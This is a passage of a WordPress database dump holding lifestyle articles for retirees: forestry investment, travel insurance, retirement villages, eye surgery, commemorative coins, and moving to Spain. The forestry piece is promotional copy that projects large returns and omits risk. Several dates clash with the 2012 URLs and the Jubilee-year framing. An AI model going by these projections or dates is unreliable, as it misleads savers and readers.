st_url=\"http://westonspirit.org.uk/2012/01/the-near-perfect-asset/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"The near perfect asset\" st_url=\"http://westonspirit.org.uk/2012/01/the-near-perfect-asset/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>With a track record of consistent growth, forestry is a stable and attractive alternative for forward-thinking investors</h4>&#13;\n<p>If you are one of the millions of people in the UK who are wondering what to do to rescue your pension, or are looking for a high-return investment for your savings plan or family trust, then you may wish to consider a forestry investment.</p>&#13;\n<p>Leading UK forestry investment specialists Ethical Forestry offer a range of investments that are seemingly leaving other companies in the shade.</p>&#13;\n<p><img class=\"alignright size-full wp-image-1509\" title=\"Ethical Forestry\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/01/Ethical-Forestry.jpg\" alt=\"\" width=\"358\" height=\"477\" />An £18,000 investment over 12 years projects a total return of £104,189, and regular payouts from year four. The products are HMRC-compliant and approved for SIPPs (self-invested personal pension) by a long list of pension trustees who have carried out thorough due diligence before approving them.</p>&#13;\n<p>Sustainable forestry investments ultimately produce valuable timber, a commodity constantly in demand and used globally on a daily basis as a building material, for paper manufacture and as a fuel source.</p>&#13;\n<p>The demand for timber is projected to rise in-line with the global population, thus implying a 55 per cent increase by 2050, according to the United Nations. Basic economics tells us that this growing demand, combined with a diminishing supply, will only make this commodity rise exponentially in value.</p>&#13;\n<p>Forestry has a proven track record of producing consistent growth for investors due to of a number of simple factors. The first being biological growth. As trees grow they become inherently more valuable. Secondly, the value of timber has historically risen above global inflation and has been the only asset class in existence that has risen in three out of the four market collapses of the 20th century. Combine these factors with the rising global demand and it’s understandable why forestry is regarded as the near perfect asset.</p>&#13;\n<p>As the tumultuous stock market continues to take investors’ money for a nerve-racking ride, thankfully, new stable alternative investments such as forestry are providing better investments for forward thinkers in an ever-changing world.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><strong><em>0800 075 3010</em></strong></p>&#13;\n<p><strong><em><a title=\"www.forestleisure.org.uk\" href=\"http://www.forestleisure.org.uk/\" target=\"_blank\">www.forestleisure.org.uk</a></em></strong></p>&#13;\n									</div>','The near perfect asset','328','publish','open','open','','the-near-perfect-asset','','','2018-04-02 20:08:18','2018-04-02 20:08:18','',0,'http://westonspirit.org.uk/the-near-perfect-asset.asp',0,'post','',0),(109,1,'2017-06-03 05:40:03','2017-06-03 05:40:03','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 January 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> mstone\" title=\"Posts by Margaret Stone\" rel=\"author\"&gt;Margaret Stone</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Travel insurance you could bank on\" st_url=\"http://westonspirit.org.uk/2012/01/travel-insurance-you-could-bank-on-2/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Travel insurance you could bank on\" st_url=\"http://westonspirit.org.uk/2012/01/travel-insurance-you-could-bank-on-2/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Travel insurance you could bank on\" st_url=\"http://westonspirit.org.uk/2012/01/travel-insurance-you-could-bank-on-2/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Travel insurance you could bank on\" st_url=\"http://westonspirit.org.uk/2012/01/travel-insurance-you-could-bank-on-2/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Travel insurance you could bank on\" st_url=\"http://westonspirit.org.uk/2012/01/travel-insurance-you-could-bank-on-2/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>It’s that time of year – no-one can escape the advertisements, supplements and features about holidays and travel. The holiday rotas are beginning to appear in the workplace and dates of school holidays are already pencilled in.</h4>&#13;\n<p>If you’re retired and not governed by the work or domestic diary, holidays can be taken as and when you like – and for as long as you like. Extended visits to families overseas are possible, and trips to holiday homes abroad can last for a month or three.</p>&#13;\n<p>There is a catch, though, for people in their 60s and 70s who enjoy such a flexible, globe-trotting lifestyle. If arranging the trips abroad is easy, arranging the travel insurance is not. And the cost rises with the years. The typical cost for an annual European travel policy for an 18-54-year-old is £52; for someone age 70 it triples to £152.</p>&#13;\n<p>There are insurers which refuse to cover travellers and holidaymakers over 65, and for anyone over 70 it can be even more difficult to obtain cover. Single trip cover is still readily available, but annual multi-trip policies are not – and if you want to travel for more than 31 days, the standard period covered, then you’ve almost had it.</p>&#13;\n<div id=\"attachment_1531\" style=\"width: 606px\" class=\"wp-caption alignright\"><img class=\"size-full wp-image-1531\" title=\"New York: getting insured isn’t a walk in the park\" src=\"/wp-content/uploads/2012/01/113592080.jpg\" alt=\"\" width=\"596\" height=\"352\" srcset=\"../../../wp-content/uploads/2012/01/113592080.jpg 596w\" sizes=\"(max-width: 596px) 100vw, 596px\" /><p class=\"wp-caption-text\">New York: getting insured isn’t a walk in the park</p></div>&#13;\n<p>But there is help at hand, from an improbable source. Bashing the banks is a popular pastime, yet the best deals in travel insurance for older people are now to be found attached to some of the premium current accounts offered by high-street banks.</p>&#13;\n<p>Lloyds’ Gold Account costs £12.95 a month and among a range of benefits is annual worldwide travel insurance for a couple up to the age of 80 for a trip of up to 31 consecutive days. Viewed solely as a travel policy, the annual cost of £155.40 is just beaten (by only a few pounds) by only one specialist travel insurer on the Go Compare website. For a further £100, it is possible to extend the cover from 31 days to three months.</p><div class=\"woo-sc-quote\"><p>There is a catch, though… if arranging the trips abroad is easy, arranging the travel insurance is not</p></div>&#13;\n<p>NatWest’s Advantage account similarly costs £12.95 a month (£155.40 a year) and also provides annual worldwide travel insurance for 31 days. That can be extended, at a cost of £187, for 90 days (although the cost varies according to the length of time requested). Once one of the couple is over 70, there is an extra charge of £50 – and by holiday insurance standards, that is a modest charge.</p>&#13;\n<p>The cost quoted by specialist travel insurance broker Delta Insurance for a 70-year-old couple with no adverse medical history needing a worldwide annual, multi-trip policy with extended cover for up to 90 days was £435.20, or £332.80 for a more restricted economy policy – with no extension available.</p>&#13;\n<p>The Go Compare site was able to include extended cover for a similar couple – but at a cost. The cheapest quote offered was £425.77 from Explorer – and the most expensive, from Club Direct, was a staggering £1,070.58.</p>&#13;\n<div class=\"woo-sc-box normal   \">&#13;\n<h3>The real deal</h3>&#13;\n<p>Online investment guru Mike Walters, 70, spends part of the year in Florida. He recently had to find travel insurance as his previous insurer’s cover stopped when he reached 70.</p>&#13;\n<p>Walters’s wife, Maggie, researched the options and found that by upping her NatWest bank account to its premium account, she was not only able to get travel insurance thrown in as part of the £155.40 annual cost plus £50, but was also able to extend the cover to 90-day for £187 – a total of £392.40.</p>&#13;\n<p>“Most policies won’t even quote for 90 days for anyone over 70 – so it’s a very good deal,” she says. “NatWest also managed to help us out over a weekend when I was in a panic – they were absolutely terrific over this and deserve a pat on the back.”</p>&#13;\n</div>&#13;\n									</div>','Travel insurance you could bank on','650','publish','open','open','','travel-insurance-you-could-bank-on','','','2018-04-02 20:08:16','2018-04-02 20:08:16','',0,'http://westonspirit.org.uk/travel-insurance-you-could-bank-on.asp',0,'post','',0),(110,1,'2017-09-21 14:51:46','2017-09-21 14:51:46','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 January 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Why settle for anything less?\" st_url=\"http://westonspirit.org.uk/2012/01/why-settle-for-anything-less/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Why settle for anything less?\" st_url=\"http://westonspirit.org.uk/2012/01/why-settle-for-anything-less/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Why settle for anything less?\" st_url=\"http://westonspirit.org.uk/2012/01/why-settle-for-anything-less/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Why settle for anything less?\" st_url=\"http://westonspirit.org.uk/2012/01/why-settle-for-anything-less/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Why settle for anything less?\" st_url=\"http://westonspirit.org.uk/2012/01/why-settle-for-anything-less/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Today’s retirement homes go beyond the idea of small and functional. From stately homes to wildflower meadows, there’s something to suit the tastes of even the most discerning retiree</h4>&#13;\n<p>To the uninitiated, a “retirement community” conjures up images of identical homes lacking character and individuality. To those in the know, however, it means quite the reverse – and they point to new schemes coming out in the next few months to prove their case.</p>&#13;\n<p>Boughton Hall shows that these communities are often brilliantly located in some of the most sought-after areas, with this one just a mile from Chester city centre and sitting on its own four acres of grounds. The original Grade II-listed house, which is a former Barnardo’s children’s home, has been restored and extended by developer Enterprise Retirement Living to host a restaurant, beauty salon, gym, bar, lounge and library. Some apartments are in this building, but most – including 28 being added this year – are in the grounds.</p>&#13;\n<p></p><div id=\"attachment_1496\" class=\"wp-caption alignright\" style=\"width: 606px\"><img class=\"size-full wp-image-1496\" title=\"Chester City\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/01/Chester-City.jpg\" alt=\"\" width=\"596\" height=\"395\" /><p class=\"wp-caption-text\">Chester city: easily accessible from Boughton Hall</p></div>&#13;\n<p>In more rural Oxfordshire, the final phase of Richmond Villages’ 36-acre Letcombe Regis scheme is taking shape. The village employs 150 people and the next 34 homes, now under construction, are tailored to customers’ needs.</p>&#13;\n<p>“We listened carefully to our residents, who told us they wanted a large living space and up to two bedrooms, especially important if they’re downsizing,” says Richmond’s managing director Paddy Brice.</p>&#13;\n<p>As its name suggests, Urban Renaissance Villages – another retirement developer – specialises in schemes that provide quality homes for older owners while also improving the wider environment of the locations in which they are based. Its Durrants Village of two- and three-bedroom homes is on a 30-acre site at Faygate, West Sussex, and replaced a dilapidated saw mill complex. In its place is a clubhouse with a pool, gym, library, medical centre and restaurant.</p>&#13;\n<p>Meanwhile, Churchill Retirement Living specialises in building communities for the over-55s, with security as a key priority. The firm’s newest schemes are on sale this year in Bournemouth, Sutton Coldfield and Hindhead in Surrey, and all feature a 24- hour Careline emergency monitoring link, a camera entry system which can be accessed from the television, and an intruder alarm in every apartment. There is also a lodge manager on site at each development to help with problems and deliveries – or just on hand for a friendly chat.</p>&#13;\n<p>For retirees who believe life outside the home is as important as life inside, Beechcroft’s Frenchlands Gate development of two- three- and four-bedroom homes at East Horsley, Surrey, has extensive landscaping. “We take as much care designing our gardens as designing our properties and invest in creating gardens that look mature from a very early stage,” says Beechcroft sales director Angela South. “Each development offers something special – a lake or pond, wildflower meadow, water feature or formal garden.”</p>&#13;\n<p>Prime locations, refurbished period gems, large grounds, state-of-the-art security, stunning landscapes – so retirement communities all look the same do they? No, they do not.</p>&#13;\n									</div>','Why settle for anything less?','492','publish','open','open','','why-settle-for-anything-less','','','2018-04-02 20:08:15','2018-04-02 20:08:15','',0,'http://westonspirit.org.uk/why-settle-for-anything-less.asp',0,'post','',0),(111,1,'2016-09-18 19:33:03','2016-09-18 19:33:03','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 March 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> dwain\" title=\"Posts by Deborah Wain\" rel=\"author\"&gt;Deborah Wain</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"A ray of hope\" st_url=\"http://westonspirit.org.uk/2012/03/a-ray-of-hope-for-your-eyesight/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"A ray of hope\" st_url=\"http://westonspirit.org.uk/2012/03/a-ray-of-hope-for-your-eyesight/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"A ray of hope\" st_url=\"http://westonspirit.org.uk/2012/03/a-ray-of-hope-for-your-eyesight/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"A ray of hope\" st_url=\"http://westonspirit.org.uk/2012/03/a-ray-of-hope-for-your-eyesight/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"A ray of hope\" st_url=\"http://westonspirit.org.uk/2012/03/a-ray-of-hope-for-your-eyesight/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Eye problems can be terrifying as you get older, but new techniques and drug treatments mean that help is hand, suggests Deborah Wain</h4>&#13;\n<p>During a shopping trip, Linda Davies noticed the vision in her right eye had clouded over, which she thought was caused by a stray eyelash.</p>&#13;\n<p>But what began as something seemingly innocuous became serious when a blood vessel in her eye burst and had to be operated on. Within a few weeks, she was left with a black hole in the centre of that eye’s vision, which meant she could no longer distinguish the features on someone’s face.</p>&#13;\n<p>Davies’s problem was age-related macular degeneration (AMD) – a condition that affects the macula, or the central part of the retina that gives detailed colour vision, and is the biggest cause of blindness in over-55s in the UK. It has attracted much publicity recently with the news that Dame Judi Dench is a sufferer, to the extent that she can no longer read scripts but has them read to her.</p>&#13;\n<p></p><div id=\"attachment_1676\" class=\"wp-caption alignright\" style=\"width: 606px\"><img class=\"size-full wp-image-1676\" title=\"Dr Bobby Qureshi\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/Dr_Bobby-Qureshi.jpg\" alt=\"\" width=\"596\" height=\"396\" /><p class=\"wp-caption-text\">Dr Bobby Qureshi</p></div>&#13;\n<p>There are two kinds of macular degeneration: wet, which occurs when abnormal blood vessels develop underneath the macula, often rapidly; and dry, which develops when cells in the macula break down over time. Many patients have a combination of the two.</p>&#13;\n<p>Wet AMD, the kind affecting Davies’s right eye, is typically treated with intravitreal injections of the drug Lucentis, now funded through the NHS, which inhibits the growth of blood vessels.</p>&#13;\n<p>However, her eye was too badly damaged to benefit, so she was reliant on the sight in her left eye, but there was further bad news when she learned this was affected by dry AMD and deteriorating.</p>&#13;\n<p>For Davies, hope came in the form of a magnifying lens implant known as an intraocular lens implant for visually impaired people (IOL-Vip). It does not halt degeneration but is the first effective treatment to improve central vision for the majority of patients with the dry form of the condition.</p>&#13;\n<p>Two small lenses are inserted into the eye. Acting in combination, they work like a miniature telescope, slightly magnifying the image and diverting it to a healthier part of the retina which takes over the role of the macula.</p>&#13;\n<p>The operation is also suitable for patients with stable, established wet AMD if scarring on the central area of the retina is limited.</p>&#13;\n<p>Davies, 65, a retired secretary from West Sussex, only heard about the treatment by chance after reading about a talk being given by eye surgeon Bobby Qureshi, consultant at the London Eye Hospital.</p>&#13;\n<p>He went on to perform Davies’s procedure, and two years on she says: “Nothing could be done for my right eye but having the implant in my left eye has meant that I can still do things I enjoy like read, work on the computer and watch television.</p>&#13;\n<p>“I’m also allowed to drive as long as long as my eyesight stays at this level, which means a lot to me as it’s my independence. I still have to wear two pairs of glasses but that’s something I can live with.”</p>&#13;\n<p>The potential for improvement in a patient’s vision can be tested before the lens implant by using a special simulator and this is a hugely important part of the process, says Qureshi.</p>&#13;\n<p>“Even an improvement that might not sound dramatic can be very significant for the patient’s quality of life,” he says.</p>&#13;\n<p>The procedure, which cost Davies around £9,000, can also help patients with other progressive macular diseases such as macular holes, myopic degeneration or hereditary retinal diseases such as Stargardt’s or Best’s disease.</p>&#13;\n									</div>','A ray of hope','605','publish','open','open','','a-ray-of-hope','','','2018-04-02 20:08:13','2018-04-02 20:08:13','',0,'http://westonspirit.org.uk/a-ray-of-hope.asp',0,'post','',0),(112,1,'2014-12-26 17:39:35','2014-12-26 17:39:35','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 March 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"A right royal souvenir\" st_url=\"http://westonspirit.org.uk/2012/03/a-right-royal-souvenir/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"A right royal souvenir\" st_url=\"http://westonspirit.org.uk/2012/03/a-right-royal-souvenir/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"A right royal souvenir\" st_url=\"http://westonspirit.org.uk/2012/03/a-right-royal-souvenir/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"A right royal souvenir\" st_url=\"http://westonspirit.org.uk/2012/03/a-right-royal-souvenir/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"A right royal souvenir\" st_url=\"http://westonspirit.org.uk/2012/03/a-right-royal-souvenir/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>From monarchs to mere mortals, commemorative coins have been around for more than a century. However controversial or popular they are, one thing remains appealing through the ages – their longevity</h4>&#13;\n<p>Commemorative coins are a way to mark the Queen’s Diamond Jubilee that will last longer than a street party, and give you a tangible link with a major royal occasion.</p>&#13;\n<p>“Royal commemorative coins are a way to bring a bit of the royal family into your own home,” says Margaret Tyler, of Wembley, North London.</p>&#13;\n<p>Tyler’s royal memorabilia includes Royal Mint-issued coins such as the Queen’s Silver Jubilee coin of 1977, the Golden Jubilee coin from 2002, the coin issued to mark the 2016 wedding of the Duke and Duchess of Cambridge and a coin celebrating the 100th birthday of the Queen Mother in 2000.</p>&#13;\n<p></p><div id=\"attachment_1680\" class=\"wp-caption alignright\" style=\"width: 606px\"><img class=\"size-full wp-image-1680\" title=\"Margaret Tyler holds the 2003 Coronation Anniversary coin. Inset, 2002 Golden Jubilee coin\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/UNP-Lyonsdown-28369-390E9F.jpg\" alt=\"\" width=\"596\" height=\"397\" /><p class=\"wp-caption-text\">Margaret Tyler holds the 2003 Coronation Anniversary coin. Inset, 2002 Golden Jubilee coin</p></div>&#13;\n<p>“They are beautifully produced – the detail of the designs is fantastic – and each one tells a story of a member of the royal family,” says Tyler.</p>&#13;\n<p>“They are something of the royals that you can hold on to. The coins are quite small and easily stored, and they can be something to hand down to your grandchildren that they will remember you for.”</p>&#13;\n<p>People have been collecting royal commemorative coins for generations. “Coin collecting started in the late 16th century as people sought a way to create a record of illustrious people such as Roman emperors,” says Barrie Cook of the department of coins and medals at The British Museum.</p>&#13;\n<p>Soon kings started making commemorative medals to mark important occasions such as funerals. “They were given to attendees who kept them as ‘touchpieces’ or keepsakes, because they carried a sense of occasion,” says Cook.</p><div class=\"woo-sc-quote\"><p>Commemorative coins are a way to bring a bit of the royal family into your own home” – Tyler</p></div>&#13;\n<p>It is this sense of occasion that still attractscollectors of royal commemorative coins today.</p>&#13;\n<p>“The first coin minted by The Royal Mint specifically as a commemorative coin was the jubilee crown marking the Silver Jubilee of George V in 1935,” says Joseph Payne, assistant curator of The Royal Mint Museum.</p>&#13;\n<p>The coin’s strikingly modern depiction of St George slaying the dragon, designed by Percy Metcalfe, was not to everyone’s taste and the design won the approval of The Royal Mint’s coin designs committee by just one vote. However, it proved popular with the public.</p>&#13;\n<p>Around 700,000 were issued, and though they bore no mention on either face of the jubilee, the lettering around the edge featured the Latin words ANNO REGNI XXV (25th year of reign).</p>&#13;\n<p></p><div id=\"attachment_1681\" class=\"wp-caption alignright\" style=\"width: 368px\"><img class=\" wp-image-1681 \" title=\"Margaret with a pick of her collection\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/UNP-Lyonsdown-28369-390EA3.jpg\" alt=\"\" width=\"358\" height=\"536\" /><p class=\"wp-caption-text\">Margaret with a pick of her collection</p></div>&#13;\n<p>A sterling silver issue of 2,500 sold out, and as more than 1,000 people applied for the 25 that were struck in gold, they were allocated by ballot. This proved controversial as the winner’s names and addresses were printed in Hansard, the official record of parliament.</p>&#13;\n<p>The reign of the present Queen was marked by the issue of the Coronation Crown of 1953 – and also features, indirectly, a commoner. Designed by Royal Academician Gilbert Ledward, the obverse featured an equestrian portrait of the new Queen on her horse Winston, at the trooping of the colour.</p>&#13;\n<p>But though the Queen had given Ledward portrait sittings, he needed more time to devote to the equestrian figure, so 28-yearold policewoman Jean Emerson was drafted in to sit on the horse and model the Queen.</p>&#13;\n<p>The Coronation Crown was to be the first of many commemorative coins issued in the reign of Elizabeth II. The Queen’s Silver Jubilee of 1977 saw the issue of the Silver Jubilee Crown. A total of 37m were minted.</p>&#13;\n<p>This year’s Diamond Jubilee collection from The Royal Mint includes commemorative coins that not only make, but also reflect history.</p>&#13;\n<p>The design unites two portraits by designer Ian Rank-Broadley.</p>&#13;\n<p>One side of the coins bears a portrait of the mature Queen in Garter Robes, while a tribute to the youthful 1953 effigy of the Queen by designer Mary Gillick appears on the reverse.</p>&#13;\n<p>“This recalls the medal struck by The Royal Mint to commemorate the Diamond Jubilee of Queen Victoria in 1887, which also bore a portrait of the young queen on one side and a more mature portrait on the other, illustrating her long reign,” says Payne of The Royal Mint Museum.</p>&#13;\n<p>It’s a link to two Queens – and two major royal occasions – and makes a jubilee commemoration piece that will last long after the street parties have ended.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><strong><em><a title=\"www.royalmint.com\" href=\"http://www.royalmint.com/\" target=\"_blank\">www.royalmint.com</a></em></strong></p>&#13;\n									</div>','A right royal souvenir','726','publish','open','open','','a-right-royal-souvenir','','','2018-04-02 20:08:12','2018-04-02 20:08:12','',0,'http://westonspirit.org.uk/a-right-royal-souvenir.asp',0,'post','',0),(113,1,'2015-07-18 18:17:30','2015-07-18 18:17:30','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 March 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"A sight without sore eyes\" st_url=\"http://westonspirit.org.uk/2012/03/a-sight-without-sore-eyes/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"A sight without sore eyes\" st_url=\"http://westonspirit.org.uk/2012/03/a-sight-without-sore-eyes/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"A sight without sore eyes\" st_url=\"http://westonspirit.org.uk/2012/03/a-sight-without-sore-eyes/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"A sight without sore eyes\" st_url=\"http://westonspirit.org.uk/2012/03/a-sight-without-sore-eyes/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"A sight without sore eyes\" st_url=\"http://westonspirit.org.uk/2012/03/a-sight-without-sore-eyes/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Breakthrough laser surgery that can dissolve cataracts in seconds with less risk of complications than conventional techniques has launched in the UK</h4>&#13;\n<p>Millions of British people can look forward to a lifetime of better sight, thanks to a revolutionary treatment that has just been launched at the London Eye Hospital in Harley Street. Offering safer, more accurate and less invasive treatment for cataracts – which affect about 60 per cent of people over the age of 60 – the new surgical procedure uses a computer-guided laser to dissolve the cataract.</p>&#13;\n<p>For years, cataracts have been regarded as an unavoidable and unpleasant side effect of ageing. Current techniques for cataract removal, which utilise high-frequency ultrasound to achieve ‘phacoemulsification’, requires a 3mm incision with a blade.</p>&#13;\n<p></p><div id=\"attachment_1688\" class=\"wp-caption alignright\" style=\"width: 307px\"><img class=\" wp-image-1688 \" title=\"London Eye Hospital\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/London-Eye-Hospital-e1330822966352.jpg\" alt=\"\" width=\"297\" height=\"358\" /><p class=\"wp-caption-text\">Patricia Paul is living life to the full again</p></div>&#13;\n<p>Where the London Eye Hospital differs from this treatment is in the microscopic detail of the procedure. Using a Femtosecond cataract laser, surgeons create a 3D model of the eye at almost micron levels (0.001mm) of accuracy. Laser pulses, which last one quadrillionth of a second, then dissolve the cataract and also create a tiny incision through which to remove it – all without needles, a blade or any discomfort.</p>&#13;\n<p>This new approach to cataract surgery reduces the risk of complications such as damage to the fine membrane surrounding the lens, and as the incision is so small the risk of infection is lower.</p>&#13;\n<p>Consultant ophthalmic surgeon Bobby Qureshi became the first surgeon in the UK to use a Femtosecond laser for cataract treatment in August 2016, and is the most experienced laser cataract surgeon in the UK. To cater to growing demand, the London Eye Hospital has opened a purpose-built operating suite with a Femtosecond cataract laser.</p>&#13;\n<p>One of Qureshi’s patients at the London Eye Hospital, Patricia Paul, had light adjustable lens surgery and was delighted by the results. “Not only was my procedure a complete success, but Qureshi was an absolute pleasure to work with,” says Paul. “He always took the time to explain everything, and was never in a rush. I now have the best vision that I’ve ever had. It’s amazing how sharp and colourful everything looks.”</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><strong><em>0207 060 2602</em></strong></p>&#13;\n<p><strong><em>admin@londoneyehospital.com</em></strong></p>&#13;\n<p><strong><em><a title=\"www.londoneyehospital.com\" href=\"http://www.londoneyehospital.com/\" target=\"_blank\">www.londoneyehospital.com</a></em></strong></p>&#13;\n									</div>','A sight without sore eyes','354','publish','open','open','','a-sight-without-sore-eyes','','','2018-04-02 20:08:10','2018-04-02 20:08:10','',0,'http://westonspirit.org.uk/a-sight-without-sore-eyes.asp',0,'post','',0),(114,1,'2017-11-12 00:48:04','2017-11-12 00:48:04','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 March 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> gnorwood\" title=\"Posts by Graham Norwood\" rel=\"author\"&gt;Graham Norwood</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Buying a home in the Spanish sun?\" st_url=\"http://westonspirit.org.uk/2012/03/buying-a-home-in-the-spanish-sun/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Buying a home in the Spanish sun?\" st_url=\"http://westonspirit.org.uk/2012/03/buying-a-home-in-the-spanish-sun/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Buying a home in the Spanish sun?\" st_url=\"http://westonspirit.org.uk/2012/03/buying-a-home-in-the-spanish-sun/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Buying a home in the Spanish sun?\" st_url=\"http://westonspirit.org.uk/2012/03/buying-a-home-in-the-spanish-sun/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Buying a home in the Spanish sun?\" st_url=\"http://westonspirit.org.uk/2012/03/buying-a-home-in-the-spanish-sun/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>If you’re thinking of retiring to Spain, following six simple steps could make all the difference between dream-come-true and nightmare, says Graham Norwood</h4>&#13;\n<p>It may not be the best time to live in Spain if you’re Spanish, given its perilous economic state. On the other hand, if you have ever contemplated moving there, now could be the best time for years.</p>&#13;\n<p>Prices of villas in some popular retirement spots have fallen up to 50 per cent since the dizzy heights of 2007 when every man and his perro boasted a second home on the Costas. More falls may follow, of course, but you will almost certainly get more property for your money than you expected if you’re looking to purchase now.</p>&#13;\n<p></p><div id=\"attachment_1668\" class=\"wp-caption alignright\" style=\"width: 368px\"><img class=\" wp-image-1668 \" title=\"Place in the sun: learn the lingo and do your research\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/73505219.jpg\" alt=\"\" width=\"358\" height=\"661\" /><p class=\"wp-caption-text\">Place in the sun: learn the lingo and do your research</p></div>&#13;\n<p>The Institute of Public Policy Research says 760,000 Britons live permanently in Spain, so you will be in good company. Most are middle-aged or retired, their favoured locations being Mallorca, Marbella, villages within an hour of Malaga airport, and the region of Valencia.</p>&#13;\n<p>Experts say there are six golden rules to a successful retirement in Spain. First, choose a location and home near like-minded people. “Buying a finca or farmhouse sounds idyllic, but you’ll be lonely and cut off unless you’re fluent in Spanish,” says Chris Mercer of Murcia-based Mercers estate agency, which reports that 75 per cent of its clients are retirees on the move. “As 99 per cent of British retirees aren’t fluent in Spanish, I wouldn’t recommend it.”</p>&#13;\n<p>Next, check on medical facilities. Think twice before buying a home in a remote location – what if the ambulance cannot find you, for example? Many experts suggest taking out private insurance to guarantee quick access to more specialists than are available solely on the country’s national health system.</p>&#13;\n<p>The third rule is learn the language. The more fluent you are, the less isolated you will be. Take lessons before you leave the UK and make sure you do not spend all your time with other expats, as you will miss out on so much local culture, cuisine and company.</p><div class=\"woo-sc-quote\"><p>Buying a finca or farmhouse sounds idyllic, but you’ll be lonely and cut off unless you’re fluent in Spanish” – Mercer</p></div>&#13;\n<p>People considering moving abroad should also take impartial expert advice when buying a home. “Have the title of your property checked by a well-established and recognised attorney,” says Christian de Meillac of Knight Frank estate agency. “If buying new, always check the track record of the developer and management company. Large international firms usually have the most experience.”</p>&#13;\n<p>Don’t burn your British property bridges, either. A growing number of expats move back, especially if they need specialist healthcare in later years, so keeping a small base in Britain means you have somewhere to stay and an investment in an economy that is much stronger than Spain’s.</p>&#13;\n<p>Finally, you should check tax and pensions with an independent financial adviser. If retiring permanently to Spain, visit www.hmrc.gov.uk or write to HM Revenue &amp; Customs (Residency), Room BP1301, Benton Park View, Newcastle-upon-Tyne NE98 1ZZ, or call 0191 203 7010. You don’t want to count the cost of not being prepared.</p>&#13;\n									</div>','Buying a home in the Spanish 